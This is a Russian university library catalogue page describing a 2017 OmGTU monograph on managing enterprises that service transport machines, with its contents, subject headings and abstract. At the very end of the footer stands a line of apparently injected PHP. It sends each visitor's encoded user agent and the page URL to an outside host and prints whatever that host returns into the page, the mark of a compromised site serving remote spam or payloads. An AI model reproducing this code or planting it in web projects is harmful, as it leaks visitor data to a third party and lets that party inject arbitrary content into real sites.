Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

212 пользователей


Зарегистрированных: 1 

Метель Максим Юрьевич


 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=E8F731ED-B97E-E1EB-998D-1AD17270F3DE$")И(("Автор=Воронов, Евгений Александрович")И(G=2017))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
E8F731ED-B97E-E1EB-998D-1AD17270F3DE
E8F731ED-B97E-E1EB-998D-1AD17270F3DE
005.7/В75
Воронов, Евгений Александрович.
Механизм управления предприятиями при организации сервисного обслуживания транспортных машин [Текст] / Е. А. Воронов ; ОмГТУ. - Омск : Изд-во ОмГТУ, 2017. - 131 с. : рис., табл. - Библиогр.: с. 124-131. - ISBN 978-5-8149-2553-4 : 225.00 р.
Содержание:
Введение. Суждения ученых по проблеме управления предприятиями и задачи, решаемые в монографии. - С. 5
Термины и определения. - С. 10
Обозначения входящих в формулы параметров и сокращений. - С. 14
1. Способы количественной оценки качества управления предприятиями сервесного обслуживания транспортных машин (ТМ). - С. 16
1.1. Понятие управления предприятием на базе усовершенствованного механизма устойчивого развития (УМУР). - С. 18
1.2. Способы количественной оценки управления предприятием. - С. 24
2. Качество используемых технологий и оказываемых услуг в деле совершенствования управления предприятием. - С. 42
2.1. Физическая сущность показателя качества КаТ. - С. 42
2.2. Анализ и формирование требований к управлению с использованием показателя КаТ. - С. 54
3. Рыночный потенциал предприятия (РПП) и его роль в повышении качества управления. - С. 64
3.1. Понятие РПП. Его сущность и содержание. Смысловая интерпретация. - С. 64
3.2. Оценка и свойства областей рыночного потенциала. Его математическая интерпретация. - С. 71
3.3. Графическая интерпретация РПП. - С. 74
3.4. Другие важные аспекты использования понятия РПП в деятельности предприятий. - С. 82
3.5. Формирование внутрифирменных потенциалов предприятия на базе РПП и организация управления. - С. 87
4. Варианты решения практических задач. - С. 92
4.1. Анализ изменений показателей экономической деятельности предприятий на основе практических данных. - С. 92
4.2. Особенности оценки показателя качества управления предприятием с учетом анализа показателя качества сервисных услуг КаТ. - С. 98
4.3. Оценка показателя качества управления с учетом состояния РПП. - С. 105
4.4. Обобщенные результаты комплексной оценки показателя качества управления предприятиями. - С. 112
Заключение. Направления реализации результатов работы. - С. 122
Список использованных источников. - С. 124
УДК 005.7:629(075)

Рубрики:
Предприятия -- Управление -- Учебники и пособия
12 (Основы теории механики и автоматического управления)
Основы теории механики и автоматического управления
Учебники и пособия -- Очное обучение

Кл.слова (ненормированные): ОМПИ -- ОМГТУ -- УЧЕБНИК И ПОСОБИЕ -- МОНОГРАФИЯ
Аннотация: Рассмотрены экономические проблемы при управлении предприятиями по сервисному обслуживанию транспортных машин. Предложен способ управления на основе комплексного учета экономических показателей в последующий и предыдущий периоды деятельности предприятия, качества оказываемых при этом сервесных услуг и обоснованного использования рыночного потенциала предприятия. Даны численные примеры расчета показателей управления для различных экономических ситуаций.
Монография предназначена обучающимся по направлению 23.03.03 "Эксплуатация транспортно-технологических машин и комплексов", будет полезна предпринимателям при организации и совершенствовании деятельности предприятий по сервисному обслуживанию транспортных машин.
Доп. точки доступа:
Омский государственный технический университет (Омск)

Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Оглавление 
Держатели документа (Информация об экземплярах) 

Рассмотрены экономические проблемы при управлении предприятиями по сервисному обслуживанию транспортных машин. Предложен способ управления на основе комплексного учета экономических показателей в последующий и предыдущий периоды деятельности предприятия, качества оказываемых при этом сервесных услуг и обоснованного использования рыночного потенциала предприятия. Даны численные примеры расчета показателей управления для различных экономических ситуаций.

Монография предназначена обучающимся по направлению 23.03.03 "Эксплуатация транспортно-технологических машин и комплексов", будет полезна предпринимателям при организации и совершенствовании деятельности предприятий по сервисному обслуживанию транспортных машин.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2838 - 18.03.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.26 с.14 запросов, 1.06c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;